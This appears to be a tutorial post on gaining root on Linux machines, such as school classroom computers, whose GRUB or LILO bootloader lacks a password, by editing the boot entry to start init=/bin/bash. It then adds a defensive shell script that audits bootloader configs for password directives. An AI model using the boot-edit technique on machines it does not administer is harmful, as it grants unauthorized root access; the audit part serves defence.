I will present a very easy but effective way to obtain a root account on a Linux machine whose boot loader is badly configured.
Sometimes [often], in school classrooms, admins forget to protect GRUB with a password, so we will explore this weakness.
When you boot your computer, you get a prompt (GRUB/LILO) asking which kernel you want to boot. If the bootloader has no password set, you can press "e" (for edit) and change the current boot definition:
(current)
title victim-kernel
root (hd0,0)
kernel /kernel-name root=/dev/hda3
to:
title supa-kernel
root (hd0,0)
kernel /kernel-name root=/dev/hda3
softlevel=single
init=/bin/bash
This will give you a shell prompt with root privileges. Sometimes, before you can modify anything, you have to remount the root partition read-write instead of read-only.
If you have a LILO boot loader rather than GRUB, just do this:
image=/boot/kernel-name
label=supa-kernel
root=/dev/hda3
append="1"
init=/bin/bash
which gives the same result.
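The weakness described above is simply a missing password directive in the bootloader configuration, so the defensive check is a file audit. The script below is an added example, not code from the original post: it looks for the directives that lock interactive editing in a GRUB legacy menu.lst (password [--md5] ...), in a lilo.conf (password=..., optionally with restricted so the prompt is only locked when extra kernel parameters are typed) and in a GRUB2 custom file (set superusers= plus password_pbkdf2, the hash coming from grub-mkpasswd-pbkdf2). The function names, the demo directory and the sample configs are constructed for the example; the password hash in them is a placeholder, not a real one.

```shell
#!/bin/sh
# Added audit example (not from the original post). It reports whether a
# bootloader config requires a password before a boot entry can be edited
# at the boot prompt. The sample configs are constructed inline so it runs
# offline; on a real host pass /boot/grub/menu.lst, /etc/lilo.conf or
# /etc/grub.d/40_custom instead.

# GRUB legacy: a top-level "password [--md5] <secret>" line locks the "e"
# (edit) and "c" (command line) keys until "p" and the password are entered.
grub_legacy_has_password() {
    grep -Eq '^[[:space:]]*password([[:space:]]+--md5)?[[:space:]]+[^[:space:]]+' "$1"
}

# LILO: "password=<secret>" (global or per image) demands a password at the
# prompt; adding "restricted" limits the demand to boots that pass extra
# kernel parameters, which is exactly the case the post relies on.
lilo_has_password() {
    grep -Eq '^[[:space:]]*password[[:space:]]*=' "$1"
}

# GRUB2: editing is locked only when "set superusers=" names an account and
# a "password" or "password_pbkdf2" line defines its credential.
grub2_has_password() {
    grep -Eq '^[[:space:]]*set[[:space:]]+superusers=' "$1" &&
    grep -Eq '^[[:space:]]*password(_pbkdf2)?[[:space:]]+' "$1"
}

# Entry point: prints PROTECTED or UNPROTECTED for a loader type and config.
audit_bootloader() {
    loader=$1; cfg=$2
    case $loader in
        grub-legacy) check=grub_legacy_has_password ;;
        lilo)        check=lilo_has_password ;;
        grub2)       check=grub2_has_password ;;
        *) echo "unknown loader: $loader" >&2; return 2 ;;
    esac
    if "$check" "$cfg"; then echo PROTECTED; else echo UNPROTECTED; fi
}

# ---- constructed sample configs (demo only) ----
DEMO=$(mktemp -d)
trap 'rm -rf "$DEMO"' EXIT

# menu.lst shaped like the entry quoted in the post, with no password line.
cat > "$DEMO/menu.lst.open" <<'EOF'
default 0
timeout 5
title victim-kernel
root (hd0,0)
kernel /kernel-name root=/dev/hda3
EOF

# Same file with a password line; the hash is a placeholder, a real one
# would come from grub-md5-crypt.
cat > "$DEMO/menu.lst.locked" <<'EOF'
default 0
timeout 5
password --md5 $1$PLACEHOLDER$replace-with-grub-md5-crypt-output
title victim-kernel
root (hd0,0)
kernel /kernel-name root=/dev/hda3
EOF

# lilo.conf without any password directive.
cat > "$DEMO/lilo.conf.open" <<'EOF'
boot=/dev/hda
prompt
timeout=50
image=/boot/kernel-name
    label=linux
    root=/dev/hda3
    read-only
EOF

# lilo.conf with a password that is only demanded for custom parameters.
cat > "$DEMO/lilo.conf.locked" <<'EOF'
boot=/dev/hda
prompt
timeout=50
password=PLACEHOLDER-change-me
restricted
image=/boot/kernel-name
    label=linux
    root=/dev/hda3
    read-only
EOF

# GRUB2 custom file with a superuser and a placeholder PBKDF2 hash.
cat > "$DEMO/40_custom" <<'EOF'
set superusers="admin"
password_pbkdf2 admin grub.pbkdf2.sha512.10000.PLACEHOLDER.PLACEHOLDER
EOF

# Run the audit over every sample so the script shows its output stand-alone.
for pair in "grub-legacy $DEMO/menu.lst.open" "grub-legacy $DEMO/menu.lst.locked" \
            "lilo $DEMO/lilo.conf.open" "lilo $DEMO/lilo.conf.locked" \
            "grub2 $DEMO/40_custom"; do
    set -- $pair
    printf '%-12s %-24s %s\n' "$1" "$(basename "$2")" "$(audit_bootloader "$1" "$2")"
done
```

On a real system the interesting lines are the UNPROTECTED ones; remember that a bootloader password only covers the boot prompt, so a machine whose BIOS/firmware still boots from removable media or whose case is open to the disk gains little from it on its own.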